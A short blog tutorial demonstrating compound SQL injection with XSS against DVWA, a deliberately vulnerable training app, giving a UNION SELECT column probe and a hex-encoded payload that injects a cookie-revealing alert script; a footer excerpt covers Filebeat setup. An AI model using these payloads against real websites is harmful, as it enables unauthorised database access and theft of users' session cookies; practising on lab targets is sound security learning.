How to Exploit compound sql injection (sql injection with xss)





Here I am using DVWA to show the real time example of sql injection with XSS

I am using a simple java script i.e.  <script>alert(document.cookie)</script>

So open your DVWA and go to the sql injection tab.






To find the number of columns pass this string ' UNION SELECT 1,2 --  and got the result like this 



Here in the above screenshot it is showing the two columns.  

Now I will try to inject xss script into sql query. Here I am using script   <script>alert(document.cookie)</script> and hex encoded value of this script is 0x3C7363726970743E616C65727428646F63756D656E742E636F6F6B6965293C2F7363726970743E.

So the payload will be ' UNION SELECT 1, 0x3C7363726970743E616C65727428646F63756D656E742E636F6F6B6965293C2F7363726970743E -- 

 
 





Thanks ...







Comments

Post a Comment

Popular posts from this blog

Filebeat configuration for ELK

Filebeat Configuration for ELK Stack Filebeat is a log shipper which can be used for linux and windows both. It is generally use for sending the logs to the server. As I am using filebeat for my ELK stack (ubuntu server), So filebeat sends logs to the logstash server. While communicating with filebeat, logstash use lumberjack protocol. Installation steps :  first you have to add the beats repository for APT :              Run the following commands: $ wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -    $ echo "deb https://artifacts.elastic.co/packages/5.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-5.x.list After this install the filebeat package $ sudo apt-get update $ sudo apt-get install filebeat After installation next step is configuration of filebeat Here we are configuring filebeat to sends logs to the logstash server. The configuration file o...
Read more